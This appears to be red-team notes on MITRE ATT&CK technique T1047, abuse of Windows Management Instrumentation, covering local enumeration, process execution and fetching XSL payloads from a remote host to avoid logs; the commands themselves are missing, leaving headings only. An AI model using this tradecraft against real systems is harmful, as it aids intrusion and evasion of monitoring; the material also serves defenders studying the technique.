T1047:Windows Management Instrumentation
Adversaries may abuse Windows Management Instrumentation (WMI) to achieve code execution. WMI is a Windows Administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.
Very awesome things we can do with wmic(Command-Line), in a local and/or remote manner.
Let's enumerate locally we can grab valued info such as Name, Manufacturer, Model, Domain and a Description
Environment
Users, Groups
Missing patches:
Execution of an XSL File
Execution, we can create a process and execute code
Wmic is proxy aware so it can also call xsl file from remote host that can contain our payloads. This is a great method to avoid logs as it is very uncommon to be used and OPSEC safe for environments.
Copy link